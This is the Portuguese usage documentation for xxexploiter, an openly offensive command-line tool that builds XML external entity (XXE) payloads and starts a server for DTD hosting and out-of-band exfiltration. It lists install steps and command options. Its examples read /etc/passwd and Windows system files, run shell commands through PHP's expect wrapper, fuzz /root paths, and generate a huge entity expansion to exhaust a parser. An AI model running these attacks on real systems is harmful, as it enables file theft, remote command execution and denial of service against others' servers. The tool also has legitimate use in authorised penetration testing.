
Ferramenta para ajudar a explorar vulnerabilidades XXE

Ele gera os payloads XML e inicia automaticamente um servidor para servir os DTDs necessários ou para fazer exfiltração de dados.
#instale node e npm se ainda não os tiver
npm install -g xxexploiter
Esta é uma aplicação Node simples escrita com TypeScript. Portanto, pode compilá-la como outras aplicações: (instale node e npm primeiro, se não os tiver)
npm install
npm run build
#pode ser necessário instalar typescript -g para que 'npm build' funcione
Para executar a aplicação, pode fazê-lo de uma das 3 formas:
npm start [args]
node dist/index.js [args]
npm link #e agora apenas chame xxexploiter
Ou pode instalá-la no seu sistema:
npm link
Usage: xxexploiter [command] [options]
Commands:
xxexploiter file [file_to_read] Use XXE to do a request
xxexploiter request [URL] Use XXE to do a request
xxexploiter expect [command] Use XXE to execute a command through PHP's expect
xxexploiter xee [expantions] Generate a huge content by resolving entities
Fuzzing Specific Options
-w, --wordlist Path to a wordlist to be used with the fuzz command. Use {{FUZZ}} placeholder in the command arg
for the magic.
-y, --success-string String to search for a success response in the requests. Not usefull for blind attacks
-n, --error-string String to search for an error response in the request. Not usefull for blind attacks
Options:
--version Show version number [boolean]
-s, --server Server address for OOB and DTD
-p, --port Server port for OOB and DTDs. Default: 7777
-t, --template path to an XML template where to inject payload
-m, --mode Extraction Mode: xml, oob, cdata. Default: xml
-e, --encode Extraction Encoding: none, phpbase64. Default: none
-o, --output Output for the XML payload file. Default is to console
-x Use a request to automatically send the xml file
-X, --request-output Output the response from -x option. If not defined goes to stdout
--verbose Enable some messages help for understanding whats happening
--doctype Specify the name of the doctype to be injected. Default is xxexploiter
-h, --help Show help [boolean]
Examples:
xxexploiter expect ls
xxexploiter -s 127.0.0.1 expect ls -e phpbase64 -m oob -o output.xml
xxexploiter -s 127.0.0.1 file /c/windows/win.ini -t xmltemplate.xml -m oob
xxexploiter xee 900000000 -o output.xml
xxexploiter file /etc/passwd -x request.txt -t template.xml
xxexploiter file /root/{FUZZ} -w wordlist.txt -n "not found" -x request.txt
Extra Info:
- When using the xml or cdata modes, add the placeholder '{{XXE}}' in the field where you want the entity content to
be injected
- When specifiying file paths for windows use forward slash.
- OOB: Out Of Bound: You can use this option to send the data processed by the xml parser, to your local webserver.
Usefull with blind attacks
- When using XML mode, it may break the XML parsing if XML reserved characters are loaded, so you may want to use
cdata
- When using the request option, you can specify the placeholder to inject the payload with {{XXE}} or {{XXE_B64}}
- When fuzzing you can add the {{FUZZ}} keyword in the main command argument.
- You can specify a string to filter successfull requests when fuzzing, either by supplying an expected error string,
or an expected success string
Se escolher usar o modo OOB ou CDATA, o XXExploiter gerará os DTDs necessários para inclusão e iniciará um servidor para hospedá-los. Tenha em mente que, se usar estas opções, deve definir o endereço do servidor.
Se incluir conteúdo no corpo do XML, tenha em mente que caracteres restritos do XML, como '<', podem quebrar a análise, por isso certifique-se de usar CDATA ou o base64encode do PHP.
A maioria das linguagens limita o número de expansões de entidades ou o comprimento total do conteúdo expandido, por isso teste o XEE na sua máquina primeiro, nas mesmas condições do alvo.